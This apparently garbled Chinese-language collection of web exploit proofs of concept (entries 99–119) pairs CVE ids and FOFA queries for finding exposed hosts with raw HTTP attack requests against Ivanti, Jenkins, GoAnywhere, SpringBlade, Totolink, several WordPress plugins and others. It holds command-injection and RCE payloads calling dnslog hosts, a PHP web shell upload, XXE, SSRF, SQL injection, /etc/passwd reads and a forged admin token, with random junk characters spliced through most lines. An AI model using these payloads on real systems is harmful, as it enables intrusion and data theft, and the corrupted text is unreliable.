5 S8 {6 r7 \; ~3 LX-Requested-With: XMLHttpRequest# ~/ E: D- s, R& `
, k Y& l* |+ f! q& D
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
# p9 @* `4 p. ^0 k; I( @0 r9 [# H {/ `1 n' \3 c+ t7 u
0 l6 R1 `% m& |! ]! B99. Ncast盈可视高清智能录播系统busiFacade RCE
2 ~; y, W( K( b' K7 O7 cCVE-2024-0305
+ p) t' z) k7 K4 P: C X0 A0 A* [FOFA:app="Ncast-产品" && title=="高清智能录播系统"
, B8 U/ v2 r) H7 s8 P0 PPOST /classes/common/busiFacade.php HTTP/1.1
. i2 r+ R$ f- f. B& LHost: 192.168.40.130:8080
* s. k% s3 w; c0 l1 ^2 {% z, G/ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 s* N! f+ l9 { n( Q9 b
Connection: close
2 O8 t( q8 M4 h8 ]4 y# ]Content-Length: 154
( J- s- ?9 B" m' R* ~& J4 [: _: G* SAccept: */*" z2 U" R5 f; z+ N* H3 A7 K+ d; k
Accept-Encoding: gzip, deflate
8 E# b( C7 c9 y( R5 c1 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ p% ]6 T( m- W+ _: m, b
Content-Type: application/x-www-form-urlencoded; charset=UTF-81 N5 X/ P6 \$ a6 L
X-Requested-With: XMLHttpRequest0 c+ [; U8 ]9 W5 P! F0 `
; L; H$ M/ G' w%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
7 X8 H1 i7 I u! ?
2 M% R. q+ [9 H. |( a! R! P* l7 _+ i) x' C6 z
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传( _$ h" M; `4 ~5 X' F$ X
CVE-2024-0352
0 T5 ~6 p$ V/ A3 F# Q) @3 L+ B/ NFOFA:icon_hash="874152924"
+ V, P6 z( e7 \" s4 y9 ~POST /api/file/formimage HTTP/1.1& g* W K4 e: U, R: G$ R' t
Host: 192.168.40.130
# g) ^# f0 f4 L+ B- HUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
' _2 @' I; R3 jConnection: close6 t [, W" w$ y d8 p
Content-Length: 2016 \5 \# F4 m8 b+ l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei; H% {- ~% x6 p4 y1 P/ e" F
Accept-Encoding: gzip
4 o2 {# V8 y# d2 U- u/ n
+ H2 B# e) i- x9 b! C% A------WebKitFormBoundarygcflwtei
0 A6 L2 H7 x; | Z! g Y0 t+ [. u5 eContent-Disposition: form-data; name="file";filename="IE4MGP.php"
3 R# V5 @2 x' bContent-Type: application/x-php" l0 I" u, k& b4 ~
# S$ v# X( |) I4 U6 }9 F# _
2ayyhRXiAsKXL8olvF5s4qqyI2O7 C& t2 L* \: N& {. B' Y/ v
------WebKitFormBoundarygcflwtei--
0 K2 x# z, k3 v6 @% K1 ? z! ~0 m) F. s0 J. M
, h% x1 h7 ]/ R) z0 N9 e1 u7 p
101. ivanti policy secure-22.6命令注入
/ p2 Y6 g8 `1 l- a, WCVE-2024-218879 k" V' ]) i4 }. g# a% B
FOFA:body="welcome.cgi?p=logo"
( `/ ~0 b9 v' e+ y5 h. BGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1% W4 G3 ]; F& @6 L: _
Host: x.x.x.xx.x.x.x
8 c- X6 @! V5 p: \# PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ a" a9 [: Y* M4 X: ?& ^3 c' p: e3 J( bConnection: close! F" X ?2 Z8 Y0 w, s
Accept-Encoding: gzip
; O9 P, v# q- j j# u5 ^) u) H2 H* \
- |7 S7 G V9 v
4 a" Q$ r" O7 I* [& D; D7 }& q102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行% G$ s& @! ]& G5 S7 H. h
CVE-2024-21893
, [$ l2 Z3 v% _+ ^) h0 |2 GFOFA:body="welcome.cgi?p=logo"0 w4 }7 m' M# {5 M) z
POST /dana-ws/saml20.ws HTTP/1.1
8 G/ K# ~3 i- G6 \& z" CHost: x.x.x.x1 `/ t# g1 {, H0 k* U2 |# t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. `6 y v& C0 a" ^* H7 L( _% L
Connection: close8 `: i8 o. R9 ~8 p
Content-Length: 792
, _, p+ ?/ r+ x( @& p: Y; rAccept-Encoding: gzip0 ] S8 S. O* Z0 ?" R
3 H) e* m* s& s2 y4 P
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
) d9 m$ Z+ Z4 V( Z* T4 F9 l; i i1 E2 L! z' T& r
103. Ivanti Pulse Connect Secure VPN XXE- L+ p* k* b& D# |# r* [# b
CVE-2024-220240 F- X2 [; q8 \3 _0 f" A c2 T
FOFA:body="welcome.cgi?p=logo"& K2 w7 E5 B# E! t( D9 S
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
( d& J9 H# k; sHost: 192.168.40.130:111
Y5 y& B. M' q, UUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.367 D- N; Y9 O$ [6 c1 l
Connection: close
7 ]) S1 |" F+ k y# D6 f7 oContent-Length: 204
6 B# Y/ N0 Y- W x) uContent-Type: application/x-www-form-urlencoded
9 _0 H& A7 W( C6 R' gAccept-Encoding: gzip
$ ?9 N9 S0 h* q ^2 K) X1 w+ n5 r, Q- u2 w$ S; H6 a2 D
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
. S" C- ?# N! |2 s) R* J" E5 D
) z" s$ b+ J A8 B% }0 ?- G; Z
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
4 D3 p) v! d' ^4 E/ y# w: A<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>( S0 |2 ^7 Q+ G% k6 Z& ~2 z& e
* C& B0 ^/ e' z4 i. L! }$ F' R& R1 k( u( A! |
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
1 i; e- n$ h9 C# ]$ o7 c2 jCVE-2024-0569
: P; n Z3 q6 `# G7 B6 T* oFOFA:title="TOTOLINK"( K6 q2 t; t! T" Z) d0 G: s! a! ?
POST /cgi-bin/cstecgi.cgi HTTP/1.16 Z: k$ s3 u: x% V
Host:192.168.0.1% F7 ]* e8 v6 D" M% }4 S8 d/ M9 }
Content-Length:41
( \" `8 C' V+ P- xAccept:application/json,text/javascript,*/*;q=0.01
4 i/ ]* z& G0 s W" s& dX-Requested-with: XMLHttpRequest) o* l5 Y) n/ e8 a) t
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36, \9 K, }# e& O+ D- I0 v
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
, `) n% i" \0 |$ q/ c7 t2 c% B2 |Origin: http://192.168.0.1$ h O+ L; }$ a3 ^' r; Q
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
& a0 r8 W! G9 W1 g" K+ E) T `Accept-Encoding:gzip,deflate
7 Q. p4 y( \% i$ C5 Z: ^Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
( \$ A L+ z) w' }* H! Z; bConnection:close
6 }- G9 g- S5 ^( H" V. w* t, v
4 u8 \$ Q4 J- X) I5 _{, ^( [* J. N& p% ]* ~
"topicurl":"getSysStatusCfg",8 I6 n& I4 `- w- V' T& w+ I- _2 Q
"token":""/ C1 Y* X' c4 ^2 o: l/ i4 Y
}
6 ^& z$ [4 A+ U9 r# A6 \) @ F3 q/ W9 T. Y$ F
105. SpringBlade v3.2.0 export-user SQL 注入# v j7 O3 w6 _- ]8 B
FOFA:body="https://bladex.vip"! C; g- {" N+ r, k: H1 V8 B
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=14 j T' s1 y8 u( F3 w3 b5 ]1 [2 J
% D! C# d Y* P% S- o2 J n
106. SpringBlade dict-biz/list SQL 注入" u; q0 a& u6 \1 I! _- L. _
FOFA:body="Saber 将不能正常工作"
# }9 A+ L' c3 ^& t5 R# V* w0 m eGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1! a2 x/ L& h3 Z' v4 H3 z
Host: your-ip
; M/ _5 b' p* R! g% NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- G. ^2 w/ U2 V r( m' i8 iBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
- I! o K8 c! }Accept-Encoding: gzip, deflate
3 U+ V' |- f1 F1 Z' T7 eAccept-Language: zh-CN,zh;q=0.9
# k& D3 C2 T7 p( h) s2 XConnection: close
, K, ?# ~2 l$ |' O4 {7 }
8 {0 j! j7 `& @" n
' I# w7 V0 T$ V( E3 s' b9 L g107. SpringBlade tenant/list SQL 注入
2 n) f( W5 _/ \% B* \6 DFOFA:body="https://bladex.vip"
- M' x' ]5 m+ b4 N* G( G" pGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.15 p: f. ] h _! s) }6 u$ R
Host: your-ip
, M5 Q7 k4 o' ~, |" s; i, J; rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. p- b" a. U/ s5 q0 x6 OBlade-Auth:替换为自己的
2 h9 O/ u G7 Q1 VConnection: close/ R$ b7 K0 h; `$ B
# ^" Y% R# w6 U+ r' J7 J7 G
5 E" e, @' ?; Z. r( C
108. D-Tale 3.9.0 SSRF
+ R/ c* E' G% d# V$ r wCVE-2024-21642; | t- p; x2 O; _ {; I' G. _
FOFA:"dtale/static/images/favicon.png"+ |" L5 ^7 m C) F& _3 Y( t
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1& L; w; Y0 B. G) Z! v& W+ `
Host: your-ip
- x1 C; n" x& BAccept: application/json, text/plain, */*6 z5 _4 {2 \8 F, ^7 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. u5 R, G5 N2 H4 n& }( EAccept-Encoding: gzip, deflate8 ?+ G; y" V9 i( i9 a
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8$ z% s- o+ M. p6 V/ W6 x
Connection: close
9 K% f! n& c( X5 M2 ?- u6 d9 E2 X' e7 D9 H* B' |: G3 s+ J: M
6 a! D7 z1 B( ^( b6 {+ b
109. Jenkins CLI 任意文件读取
) P, B$ F/ q6 ]& }0 ~ Z' X& xCVE-2024-23897; M/ ~8 K2 E3 J; D5 o
FOFA:header="X-Jenkins"1 v) p$ j* J% K6 b) v
POST /cli?remoting=false HTTP/1.15 r& o' i1 }5 [" v* i
Host:
+ l! m& }& b5 K( ^1 T3 C2 KContent-type: application/octet-stream
' c0 n2 g) ?8 p l& C! e2 _: jSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e921 C2 q+ P6 ]9 d0 Y. i
Side: upload
8 K+ {8 O8 k# ], K- v D) E& \3 r+ JConnection: keep-alive
; e3 k6 C E4 s9 GContent-Length: 1639 J7 j7 m; I6 { U5 P* K! m$ J
J! l7 n( B, m5 E. J1 L3 {; O
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03', b8 S$ _+ h4 q
/ n& V( }, g' t+ h# w8 b( j/ Z% N- f
POST /cli?remoting=false HTTP/1.10 L* j3 j7 N" E$ G4 y
Host:- y2 S$ c) H! U" |" @7 m8 K C# r0 n* @+ @
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 D2 V! k5 f5 |! D& [
download$ z+ k; J" E9 `- S3 }( o$ p, M" r2 b! Z
Content-Type: application/x-www-form-urlencoded
. g7 U% h0 |# K9 NContent-Length: 0' S4 ]: p' E, X% g8 E. X, z
7 ] D' ]& {% ]2 ^8 Y: S8 {# i
2 A, t8 {. m+ l9 a0 P! b0 J& [ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4 k# p5 z* f% v9 w% `1 ijava -jar jenkins-cli.jar help
/ Q$ _* Y& A% f3 B' i) S[COMMAND]
, L5 u% n1 w% m: R9 \Lists all the available commands or a detailed description of single command.
1 S5 K7 x7 H8 g$ |, | COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
: O6 ^: E% l9 T- m# O6 u4 u. {: s7 a x
* E2 c1 A) {5 Z
110. Goanywhere MFT 未授权创建管理员! c C( B% u& b
CVE-2024-0204; W4 K. p2 i" e y0 v5 |( ]
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"# ^' |9 S1 K5 [& X6 h6 f) b2 h c, H
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
$ {2 c0 O4 M. \0 B+ j1 @' yHost: 192.168.40.130:80003 Y4 R3 ]" V. f# b
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.369 ], U: Q8 `$ e! y* o3 u
Connection: close& D7 |( k( E4 D ~3 V) |
Accept: */*) s5 k1 F" J7 |& g* j2 m3 s
Accept-Language: en% p) t) T$ T/ _0 ]. D
Accept-Encoding: gzip2 D# n5 X7 ~+ u6 `. ~
3 t1 H$ R# s! u1 {) [- a
' x5 G% P$ w; s" ^3 {( @% T111. WordPress Plugin HTML5 Video Player SQL注入* J/ K5 i6 v4 y/ q/ @
CVE-2024-10612 Q) Q3 h9 I) U' U9 }$ g
FOFA:"wordpress" && body="html5-video-player"6 J/ f3 u) W6 j; d
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
0 l8 S: {" _- L- L# C1 M. wHost: 192.168.40.130:112
5 @$ U9 K+ L$ K* b# I) E7 bUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ C2 }% P+ i9 H
Connection: close' G* z$ M# n: \( |9 M4 g9 U
Accept: */*! w* Z" z/ _6 s, F. D' W- Y
Accept-Language: en
% S: H) Y, K( s4 h W+ I; v2 F& A @Accept-Encoding: gzip
& w0 G5 p3 h/ K5 h+ O; u% E# F' V6 K6 ~5 r+ Y
. w E7 W4 T. U9 Q112. WordPress Plugin NotificationX SQL 注入
9 k6 t9 G+ `) m7 c6 w. Q+ HCVE-2024-1698
4 P- f* l3 s, z" X5 `6 z2 P VFOFA:body="/wp-content/plugins/notificationx"
* j: K! c: k+ u9 w7 a |POST /wp-json/notificationx/v1/analytics HTTP/1.1
6 x6 f3 q/ Q6 g/ [7 [0 lHost: {{Hostname}}
4 C5 r) g4 Q6 _. B7 i J( b9 uContent-Type: application/json6 M, ]: s+ v3 `* X8 b
; o* r- f+ {) F# V) H{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}, e2 h- K( b2 c% `+ J8 r0 t5 m
/ w1 |" J3 ]9 x
$ f {0 h! [' Z! l. H5 Z113. WordPress Automatic 插件任意文件下载和SSRF
- F( {3 r$ U9 l, a/ L, R+ P" ~CVE-2024-279540 ?6 o7 j o8 o+ N8 o. @. u( ]
FOFA:"/wp-content/plugins/wp-automatic"
, V/ b, J' O! f9 U3 X$ T* g% iGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
# e0 W) p3 t; k6 D, S" m( H& b4 VHost: x.x.x.x
* V& _& _2 A* X9 S; k! B& e2 eUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! {- l- d9 ?0 e5 U" f0 O3 {Connection: close$ Y9 I: s. ~- `7 \) V
Accept: */*2 t* b- J1 ]8 E$ l: O1 _- N
Accept-Language: en
' q4 e8 k5 v0 N" a& }1 MAccept-Encoding: gzip* Q8 m: j& u* l, c# B- U- k
- D. i( \( C Z5 g/ G+ ~9 P2 n7 l5 ~( B8 i, s
114. WordPress MasterStudy LMS插件 SQL注入
0 @: P8 g) t* Z, ]% X& \% Z; rFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/". n4 j) M4 a! w( c# \( W
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 h- q) B2 Q( y8 C% `7 I# S, f
Host: your-ip
4 R/ W- H+ H: |# p/ d& dUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ O& r( }- [9 W4 z, c& m% x
Accept-Charset: utf-8
- `8 L2 n: k G5 G) F+ oAccept-Encoding: gzip, deflate
: w1 v* u' q! q7 rConnection: close
4 V3 k9 f/ z" M
- m+ I9 J: U2 q- n- }" @. L# @
( G, U( m, C; R% I8 Y# O115. WordPress Bricks Builder <= 1.9.6 RCE9 a! K7 J, L7 I6 K% {( T8 R
CVE-2024-25600
% x/ I/ U6 _! \ wFOFA: body="/wp-content/themes/bricks/"# E1 c. ]& u6 O
第一步,获取网站的nonce值
" Q9 x Z' e0 u. ?) P8 mGET / HTTP/1.1& ~4 Q- }& k; |; q, G
Host: x.x.x.x, U8 F$ L, P; m; d! m! @- b
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
/ p" q% m% B0 T! u8 r9 x! I' bConnection: close
Z6 ~$ ]- Y+ w/ F4 X- KAccept-Encoding: gzip
1 o, f5 u; ^; a2 W' ~, Y2 i' }
* z: s4 u7 B4 C |2 E
& V, Q8 a* @6 Q; M第二步替换nonce值,执行命令8 W1 M; c' X* k7 c1 v. v4 D
POST /wp-json/bricks/v1/render_element HTTP/1.11 Z5 X) d3 e+ A a* {, X
Host: x.x.x.x+ Y5 x1 b, K3 Y. @. m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 e9 ^1 o" g, f4 h; ^
Connection: close
5 K: A0 Q: i) I$ W" \0 f* tContent-Length: 356
2 `) c3 K: n1 ]# n% QContent-Type: application/json r; }! N! i% Z- f; ?' L0 F
Accept-Encoding: gzip
1 G' ^) L& ^& A1 r# W" B! m1 E. n! r+ B7 @
{
* z( U* m: B' ~$ j"postId": "1",
1 d( T4 C/ F% w0 @8 D "nonce": "第一步获得的值",% |! \+ Q- B) }% ^3 r2 W& g
"element": {
3 I. y) m$ d: ^! ~6 R "name": "container",
* J( c" G, G Z "settings": {7 @" } c! L. U8 {& Q8 j+ x
"hasLoop": "true",
5 `7 i+ U6 v% @4 }+ T f7 I8 C) } "query": {
5 Q. {' |! s, ~4 Q* b "useQueryEditor": true,
3 o8 ~5 Z1 N: V/ N5 T "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
8 }5 X& M% V0 }# t5 Y) J3 Y" n. I "objectType": "post"
4 X* _- f2 I$ _( s4 j W7 E }# x! a2 C! P1 r% {
}
2 |, F9 i. P1 }! i* _ }
8 [) C0 ~+ m @) V3 P9 f- `}5 N7 ~4 [+ r( @4 G) e* ]
3 M) o# E: C! n9 l: d
, b4 e, Z0 n6 y: U
116. wordpress js-support-ticket文件上传+ x1 w# e) Y4 `
FOFA:body="wp-content/plugins/js-support-ticket"
- P! H0 w, f0 K4 ?% I# q! sPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
# Y) i0 F8 M+ _1 eHost: \1 Y* _' h" V1 b. @% I6 f/ W( X
Content-Type: multipart/form-data; boundary=--------767099171
' O+ D' V8 K! s E% h9 i$ R+ c9 q% WUser-Agent: Mozilla/5.0+ F" W4 n" C. T: x/ Z
' x1 c2 J! D9 V g b* ?) B----------767099171
. t) _ o9 p# pContent-Disposition: form-data; name="action"
: M t) c2 ]" E' o9 L0 `# F3 Nconfiguration_saveconfiguration
) C+ U/ e d. d( {. J' e----------7670991718 h2 @; k) M( B! M$ q( n9 ?* q
Content-Disposition: form-data; name="form_request"
' X+ H5 [, [4 G% u. Gjssupportticket) }3 a; k+ d2 O k {4 F
----------767099171+ U: c* b* j) t& g5 j& _( z6 v
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
! w# e4 H: m% M: \, J+ eContent-Type: image/png1 y7 B; Z! V0 i, _1 \7 N
----------767099171--
5 _! F( I. k5 a' s, z) P( R
( V7 O9 I7 |* Y1 M" E& M8 l1 i8 r* `) N" K
117. WordPress LayerSlider插件SQL注入
# Q2 O9 q) R/ ~; _ d( \, @* Iversion:7.9.11 – 7.10.0! \0 b5 z( t$ @# Y/ R4 d6 ^% i/ \: }
FOFA:body="/wp-content/plugins/LayerSlider/"9 J. Z( H* m$ _) m9 E" G
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1; g5 E7 M7 H" j, W
Host: your-ip, x+ M1 i6 P4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ n/ ?: X: d* e+ P% R$ Z# iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ n: o6 p, }( ]' F B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& g8 w2 I' x9 @; w
Accept-Encoding: gzip, deflate, br
: c8 I6 R+ z Z! C) f7 }Connection: close
1 f4 x* m' d# tUpgrade-Insecure-Requests: 11 H, I0 h. S; q0 Q @' `9 g, Y
6 j" }/ s: a A2 N% ?2 M Y) C
# V; J! H' m5 s0 ~
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传. M: Y j! T/ H3 ^" |- H
CVE-2024-0939
& G* O$ f4 m! c" ^9 h0 @/ j9 F0 p4 \FOFA:title="Smart管理平台"
. n2 m, H7 p% x% V! {POST /Tool/uploadfile.php? HTTP/1.1
' t# H% Y7 ~ D* Y# J1 U. @Host: 192.168.40.130:8443
* c9 z c$ a( h6 h8 b$ RCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f82 w6 n& S& C* @ s; d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
* ?1 F1 ~: ]4 b! WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 g& R8 f+ V/ v, j. i9 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 o) j' i( \( lAccept-Encoding: gzip, deflate, t# Q. k: c1 [* R, V, u2 u6 f
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
, f% j, P( y4 Q, \: T; UContent-Length: 4056 g9 k0 R" j- j' H" ^* U' {( g* V
Origin: https://192.168.40.130:84436 g$ n9 o& a$ q7 o" o" k3 ?
Referer: https://192.168.40.130:8443/Tool/uploadfile.php9 v4 l3 s* w( e% X3 u
Upgrade-Insecure-Requests: 1, c' i3 o. _ O0 a, h* K) E1 z3 f& `
Sec-Fetch-Dest: document
/ z. d2 V# P. x7 v" |Sec-Fetch-Mode: navigate
2 X3 }; _' |- D+ G9 G/ {; W4 wSec-Fetch-Site: same-origin/ L# B- E, ?2 g i' V: I2 T7 ?
Sec-Fetch-User: ?1 k9 m4 \; ~& L* K6 @
Te: trailers" w9 f6 ~ K0 f. Z. Z1 E& e
Connection: close- ?5 }! t0 u- }+ D: C$ [) I# b
) @3 @+ o3 O" R/ \- l-----------------------------13979701222747646634037182887
6 ^! \3 T; Z; p3 g5 a4 |- V% mContent-Disposition: form-data; name="file_upload"; filename="contents.php"
+ a, p+ `- F; ~ G! D. qContent-Type: application/octet-stream+ b* B7 z! U; d& a/ K' t
$ ?. ~0 t# ~* V<?php
% z! r1 T( t- s( U2 Q/ Asystem($_POST["passwd"]);
7 \& q9 g) r; x8 ?' M& R3 c: _9 Q?>" T" h p9 U1 W3 C7 g0 P
-----------------------------13979701222747646634037182887
% ^8 P* O4 v! ~" AContent-Disposition: form-data; name="txt_path"
7 B6 `) A$ h( Y1 ?* n3 t3 Z- Y O
3 t3 b9 f9 d- y5 [/home/src.php
8 H9 c$ ?$ k- L-----------------------------13979701222747646634037182887--
" a' T1 a6 H" R
' s- A& v$ b Z+ B. @% i
' ^) s! @/ H3 V. O4 f6 B0 r/ s- ?! \访问/home/src.php
3 C+ N$ i! I3 F- c9 q- y5 K3 T
, y$ ]0 Y, f' L119. 北京百绰智能S20后台sysmanageajax.php sql注入' B8 U/ ]6 `7 K+ t) @
CVE-2024-1254
- F% W, T; d8 c2 [ x" }, f' C( B |FOFA:title="Smart管理平台"
5 H' p$ T1 U' F* p! j a4 t, z先登录进入系统,默认账号密码为admin/admin# T! S, A7 j3 w% _# X" T, `( c
POST /sysmanage/sysmanageajax.php HTTP/1.11! A8 m6 v* H: c& h
Host: x.x.x.x5 }$ x% l9 J# t# j/ U- @/ S
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
{$ J* ~% x2 ~+ T$ \( ?( ^9 i0 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
6 R2 \9 n6 E6 @8 d ~& SAccept: */*. `" H! E; A/ x! f: ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: F, F% _8 v0 s9 r* a3 i
Accept-Encoding: gzip, deflate9 C7 o' R- l/ W3 {5 [9 S# ~: h! Z$ g
Content-Type: application/x-www-form-urlencoded;
1 s, j" ^- K7 fContent-Length: 109
8 l+ R2 p. q1 A. e. } h' L4 U! xOrigin: https://58.18.133.60:8443
/ c0 u$ e( x( r2 c: H: T4 Q+ HReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php; x& _. a- \* U
Sec-Fetch-Dest: empty' R* B6 h% {3 x/ ~+ L
Sec-Fetch-Mode: cors: x0 T% c" P6 {6 P
